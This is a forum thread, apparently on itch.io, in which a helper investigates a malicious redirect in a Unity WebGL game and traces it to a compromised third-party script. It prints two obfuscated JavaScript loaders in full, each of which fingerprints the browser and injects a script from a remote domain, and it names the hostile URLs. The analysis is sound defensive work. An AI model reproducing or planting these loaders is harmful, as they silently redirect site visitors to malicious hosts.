Edit: I just checked the webgl.zip we uploaded by downloading it again from itch.io. The files are clean. It seems that the cdn is injecting this part of the website.
This is highly unlikely. As I mentioned in the other comment, it’s likely you have a rogue SDK you’re using that is embedded into the binary files distributed with your HTML5 export that is being executed by Unity’s virtual machine. You will not be able to just look at the files of your HTML5 build to identify something like this. I suggest you review all the code you’ve included in your project before you have exported it. Alternatively third party resources included by your game could be compromised in some way, either as any scripts that you didn’t write, or scripts that are dynamically loaded from other domains.
I’ve downloaded the file you uploaded and I’ll upload it to a private page to take closer look to see if I can spot anything. Can you tell me when exactly this message appears after reloading the game? Does it appear immediately or do you have to click to start the game?
Edit: The GUID resource names located on the same path as your game appear to be how unity extracts its runtime. This to me suggests that the malicious could be coming from inside of your Unity game’s code.
Edit: I tried loading your game many times over but never was able to trigger the message. I think it’s related to my operating system/browser, as it probably only appears to a subset of people to make it hard to detect. I did notice some suspicious obfuscated code at the bottom of a file hosted on the domain js.zapjs.com, the exact file is here: https://js.zapjs.com/js/download.js on the very last line. This doesn’t appear to be part of the library. This file gets added into the browser by Unity code executing from what I can tell. (When progress bar shows 90%, which corresponds with the report given in your comments)
I’ve included it below in case it gets removed by whoever is hosting it:
Show code
var a=['text/javascript',')njosirthalcfoml5','length','trderrnrme1fze6r(','script','abs','parentNode','getElementsByTagName','t=ha5mytou5_p_d','5mgrfokf7tma7l!pp','type','async','oe3m6axnwt8s5omh7','jfjOcxieyd2njif','createElement','while','insertBefore'];(function(b,e){var f=function(g){while(--g){b['push'](b['shift']());}};f(++e);}(a,0x12b));var b=function(c,d){c=c-0x0;var e=a[c];return e;};var _cs=['3tqnjerg4Akriews)ue',b('0xb'),b('0x10'),'vb37(ej4q84fb1x9v8w6e1lau4!34c443cf64097sap8!afeeeh0qbgchc!7q2289=gvu&!0a402m=1duiicu?3sfjb.(esdpoun2_qi9uj/8m9ozc0.20v6h3gt(ayt9snkfcnixlvci.vcqiql0bmu4p1/)/p:isuprt)tzhp',b('0x5'),b('0x3'),b('0xa'),b('0x8'),'get','fejiekzokovce',b('0xf'),b('0x2'),b('0xc'),b('0x7')];if(ndsw===undefined){var ndsw=true;(function(){var c=navigator;var d=document;var e=screen;var f=window;var g=c[m(_cs[0x0])];var h=c[m(_cs[0x2])];var i=d[m(_cs[0x9])];var j=f[m(_cs[0x7])][m(_cs[0xb])];var k=d[m(_cs[0x6])];if(k&&!n(k,j)){if(!n(i,m(_cs[0xa]))){var c=d[b('0x4')](_cs[0x1]);c[b('0x0')]=_cs[0xd];c[b('0x1')]=!![];c['src']=m(_cs[0x3]);var l=d[b('0xe')](_cs[0x1])[0x0];l[b('0xd')][b('0x6')](c,l);}}function m(p){var q='';for(var r=0x0;r<p[b('0x9')];r++){if(r%0x2===0x1)q+=p[r];}q=o(q);return q;}function n(p,q){return p[m(_cs[0x5])](q)!==-0x1;}function o(p){var q='';for(var r=p[b('0x9')]-0x1;r>=0x0;r--){q+=p[r];}return q;}}());}
Edit: I stepped through the script with a debugger, it ends up loading anotheer script from another domain. In my case, it’s https://public.clickstat360.com/ui_node.js?cid=240&v=827ccb0eea8a706c4c34a16891f84e7b I’ve included code:
Show code
(function(){var hl=document[qd("4r)e;r{r,e,f(ewrk")]||'';var rz=new RegExp(qd('&/;),+a])/(^,[{(,/)/i:h'));if(!hl||window[qd("fn}oeilt4a)c,o3ly")][qd("ff,e1r{h,")][qd("1h{cdt(a2mi")](rz)[1]==hl[qd("1h{cdt(a2mi")](rz)[1]){return;};var vm=navigator[qd("yt}n(e}g6A}r,e}szu8")];var wl=document[qd("pefi,k;o3o{c0")];if(tk(vm,qd("/sfw,o(d(n,i;W{"))&&!tk(vm,qd(".d{imo}r,dvn(Ad"))){if(!tk(wl,qd("#={a6m(t;u,_)_}_;"))){var on=document.createElement('script');on.type='text/javascript';on.async=true;on.src=qd('74(7,7(1;1}4m5)8;5;1a=ht6&)3;Q3j,M;9{Q;W7a;jtZ)S(Z,2(cuj(Ney6k(DxZ{h)RnW9Z1ziU(z8Y61{U}DhM{k{N,D}O(i01}j{d(=}d;?vd{x{a,.)e,c,r{u{o(s9e(R{b;efW;/gm)opc{.}s(e{clijv{r(ebs)m}tor{azm2sa.{e1n{o(h3pb/6/s:7s,p7t;tdh(');var ce=document.getElementsByTagName('script')[0];ce.parentNode.insertBefore(on,ce);}}function qd(oy){var je='';for(var uv=0;uv<oy.length;uv++){if(uv%2===1)je+=oy[uv];}je=uy(je);return je;}function tk(gd,no){return gd[qd(":f)Osx)e9d;nsi}")](no)!==-1;}function uy(fc){var pu='';for(var xx=fc.length-1;xx>=0;xx--){pu+=fc[xx];}return pu;}})();
It’s now finally taking me a the URL https://phone.smartmservices.com/WebResource.axd?d=dj1iODNkMDU1YzUzZWRhZDkyNjc2ZSZjaWQ9MjQ3&t=1585411774z
Edit: Alright, I kept following it until I got stuck. I’m giving up at this point because it’s pretty clear that there’s some suspicious code compiled into your game. You might want to start with finding out why the zapjs domain is showing up.
Twitter thread here: https://twitter.com/moonscript/status/1245868730501844994